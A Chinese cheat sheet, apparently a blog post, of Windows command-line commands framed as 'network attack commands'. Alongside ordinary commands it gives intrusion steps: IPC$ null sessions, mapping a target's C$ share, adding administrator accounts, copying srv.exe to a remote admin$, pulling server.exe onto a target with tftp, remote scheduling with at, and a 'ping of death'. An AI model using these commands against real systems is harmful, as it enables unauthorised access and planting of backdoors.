网络攻击命令大全(一)

基本上可以作为电子书使用,希望对各位有用
net use \\ip\ipc$ " " /user:" "
建立 IPC 空链接
net use \\ip\ipc$ "
密码 " /user:" 用户名 " 建立 IPC 非空链接
net use h: \\ip\c$ "
密码 " /user:" 用户名 " 直接登陆后映射对方 C :到本地为 H:
net use h: \\ip\c$
登陆后映射对方 C :到本地为 H:
net use \\ip\ipc$ /del
删除 IPC 链接
net use h: /del
删除映射对方到本地的为 H: 的映射
net user
用户名 密码  /add 建立用户
net user guest /active:yes
激活 guest 用户
net user
查看有哪些用户
net user
帐户名 查看帐户的属性
net localgroup administrators
用户名 /add 用户 添加到管理员中使其具有管理员权限 , 注意: administrator 后加 s 用复数
net start
查看开启了哪些服务
net start
服务名  开启服务; ( :net start telnet net start schedule)
net stop
服务名 停止某服务
net time \\
目标 ip 查看对方时间
net time \\
目标 ip /set 设置本地计算机时间与 目标 IP” 主机的时间同步 , 加上参数 /yes 可取消确认信息
net view
查看本地局域网内开启了哪些共享
net view \\ip
查看对方局域网内开启了哪些共享
net config
显示系统网络设置
net logoff
断开连接的共享
net pause
服务名 暂停某服务
net send ip "
文本信息 " 向对方发信息
net ver
局域网内正在使用的网络连接类型和信息
net share
查看本地开启的共享
net share ipc$
开启 ipc$ 共享
net share ipc$ /del
删除 ipc$ 共享
net share c$ /del
删除 C :共享
net user guest 12345
guest 用户登陆后用将密码改为 12345
net password
密码 更改系统登陆密码
netstat -a
查看开启了哪些端口 , 常用 netstat -an
netstat -n
查看端口的网络连接情况,常用 netstat -an
netstat -v
查看正在进行的工作
netstat -p
协议名 例: netstat -p tcq/ip 查看某协议使用情况(查看 tcp/ip 协议使用情况)
netstat -s
查看正在使用的所有协议使用情况
nbtstat -A ip
对方 136 139 其中一个端口开了的话,就可查看对方最近登陆的用户名( 03 前的为用户名) - 注意:参数 -A 要大写
tracert -
参数 ip( 或计算机名 ) 跟踪路由(数据包),参数: “-w 数字 用于设置超时间隔。
ping ip(
或域名 ) 向对方主机发送默认大小为 32 字节的数据,参数: “-l[ 空格 ] 数据包大小 “-n 发送数据次数 “-t” 指一直 ping
ping -t -l 65550 ip
死亡之 ping( 发送大于 64K 的文件并一直 ping 就成了死亡之 ping)
ipconfig (winipcfg)
用于 windows NT XP(windows 95 98) 查看本地 ip 地址, ipconfig 可用参数 “/all” 显示全部配置信息
tlist -t
以树行列表显示进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
kill -F
进程名 -F 参数后强制结束某进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
del -F
文件名 -F 参数后就可删除只读文件 ,/AR /AH /AS /AA 分别表示删除只读、隐藏、系统、存档文件, /A-R /A-H /A-S /A-A 表示删除除只读、隐藏、系统、存档以外的文件。例如 “DEL/AR *.*” 表示删除当前目录下所有只读文件, “DEL/A-S *.*” 表示删除当前目录下除系统文件以外的所有文件

del /S /Q
目录 或用: rmdir /s /Q 目录 /S 删除目录及目录下的所有子目录和文件。同时使用参数 /Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move
盘符 \ 路径 \ 要移动的文件名 存放移动文件的路径 \ 移动后文件名 移动文件 , 用参数 /y 将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt
对比二个文件并把不同之处输出到 3st.txt 文件中, "> " "> >" 是重定向命令
at id
开启已注册的某个计划任务
at /delete
停止所有计划任务,用参数 /yes 则不需要确认就直接停止
at id
/delete 停止某个已注册的计划任务
at
查看所有的计划任务
at \\ip time
程序名 ( 或一个命令 ) /r 在某时间运行对方某程序并重新启动计算机
finger username @host
查看最近有哪些用户登陆
telnet ip
端口 远和登陆服务器 , 默认端口为 23
open ip
连接到 IP (属 telnet 登陆后的命令)
telnet
在本机上直接键入 telnet 将进入本机的 telnet
copy
路径 \ 文件名 1  路径 \ 文件名 2 /y 复制文件 1 到指定的目录为文件 2 ,用参数 /y 就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\admin$
复制本地 c:\srv.exe 到对方的 admin
cppy 1st.jpg/b+2st.txt/a 3st.jpg
2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注: 2st.txt 文件头要空三排,参数: /b 指二进制文件, /a ASCLL 格式文件
copy \\ip\admin$\svv.exe c:\
:copy\\ip\admin$\*.* 复制对方 admini$ 共享下的 srv.exe 文件(所有文件)至本地 C
xcopy
要复制的文件或目录树 目标地址 \ 目录名 复制文件和目录树,用参数 /Y 将不提示覆盖相同文件
tftp -i
自己 IP( 用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后,将 “IP” server.exe 下载到目标主机 c:\server.exe 参数: -i 指以二进制模式传送,如传送 exe 文件时用,如不加 -i 则以 ASCII 模式(传送文本文件模式)进行传送
tftp -i
对方 IP   put c:\server.exe 登陆后,上传本地 c:\server.exe 至主机
ftp ip
端口 用于上传文件至服务器或进行文件操作,默认端口为 21 bin 指用二进制方式传送(可执行文件进);默认为 ASCII 格式传送 ( 文本文件时 )
route print
显示出 IP 路由,将主要显示网络地址 Network addres ,子网掩码 Netmask ,网关地址 Gateway addres ,接口地址 Interface
arp
查看和处理 ARP 缓存, ARP 是名字解析的意思,负责把一个 IP 解析成一个物理性的 MAC 地址。 arp -a 将显示出全部信息
start
程序名或命令 /max /min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem
查看 cpu 使用情况
attrib
文件名 ( 目录名 ) 查看某文件(目录)的属性
attrib
文件名 -A -R -S -H +A +R +S +H 去掉 ( 添加 ) 某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir
查看文件,参数: /Q 显示文件及目录属系统哪个用户, /T:C 显示文件创建时间, /T:A 显示文件上次被访问时间, /T:W 上次被修改时间
date /t
time /t 使用此参数即 “DATE/T” “TIME/T” 将只显示当前日期和时间,而不必输入新日期和时间
set
指定环境变量名称 = 要指派给变量的字符 设置环境变量
set
显示当前所有的环境变量
set p(
或其它字符 ) 显示出当前以字符 p( 或其它字符 ) 开头的所有环境变量
pause
暂停批处理程序,并显示出:请按任意键继续 ....
if
在批处理程序中执行条件处理(更多说明见 if 命令及变量)
goto
标签 cmd.exe 导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如: start” 标签)
call
路径 \ 批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见 call /?
for
对一组文件中的每一个文件执行某个特定命令(更多说明见 for 命令及变量)
echo on
off 打开或关闭 echo ,仅用 echo 不加参数则显示当前 echo 设置
echo
信息 在屏幕上显示出信息
echo
信息 >> pass.txt " 信息 " 保存到 pass.txt 文件中
findstr "Hello" aa.txt
aa.txt 文件中寻找字符串 hello
find
文件名 查找某文件
title
标题名字 更改 CMD 窗口标题名字
color
颜色值 设置 cmd 控制台前景和背景颜色; 0 =黑、 1 =蓝、 2 =绿、 3 =浅绿、 4 =红、 5 =紫、 6 =黄、 7= 白、 8= 灰、 9= 淡蓝、 A =淡绿、 B= 淡浅绿、 C= 淡红、 D= 淡紫、 E= 淡黄、 F= 亮白
prompt
名称 更改 cmd.exe 的显示的命令提示符 ( C:\ D:\ 统一改为: EntSky\ )

ver
DOS 窗口下显示版本信息
winver
弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format
盘符 /FS: 类型 格式化磁盘 , 类型 :FAT FAT32 NTFS , 例: Format D: /FS:NTFS
md
 目录名 创建目录
replace
源文件 要替换文件的目录 替换文件
ren
原文件名 新文件名 重命名文件名
tree
以树形结构显示出目录,用参数 -f 将列出第个文件夹中文件名称
type
文件名 显示文本文件的内容
more
文件名 逐屏显示输出文件
doskey
要锁定的命令=字符
doskey
要解锁命令 = DOS 提供的锁定命令 ( 编辑命令行,重新调用 win2k 命令,并创建宏 ) 。如:锁定 dir 命令: doskey dir=entsky ( 不能用 doskey dir=dir) ;解锁: doskey dir=
taskmgr
调出任务管理器
chkdsk /F D:
检查磁盘 D 并显示状态报告;加参数 /f 并修复磁盘上的错误
tlntadmn telnt
服务 admn, 键入 tlntadmn 选择 3 ,再选择 8, 就可以更改 telnet 服务默认端口 23 为其它任何端口
exit
退出 cmd.exe 程序或目前,用参数 /B 则是退出当前批处理脚本而不是 cmd.exe
path
路径 \ 可执行文件的文件名 为可执行文件设置一个路径。
cmd
启动一个 win2K 命令解释窗口。参数: /eff /en 关闭、开启命令扩展;更我详细说明见 cmd /?
regedit /s
注册表文件名 导入注册表;参数 /S 指安静模式导入,无任何提示;
regedit /e
注册表文件名 导出注册表
cacls
文件名 参数 显示或修改文件访问控制列表( ACL ―― 针对 NTFS 格式时。参数: /D 用户名 : 设定拒绝某用户访问; /P 用户名 :perm 替换指定用户的访问权限; /G 用户名 :perm 赋予指定用户访问权限; Perm 可以是 : N 无, R 读取, W 写入, C 更改 ( 写入 ) F 完全控制;例: cacls D:\test.txt /D pub 设定 d:\test.txt 拒绝 pub 用户访问。
cacls
文件名 查看文件的访问用户权限列表
REM
文本内容 在批处理文件中添加注解
netsh
查看或更改本地网络配置情况

你可能感兴趣的:(网络,命令,大全,攻击,休闲)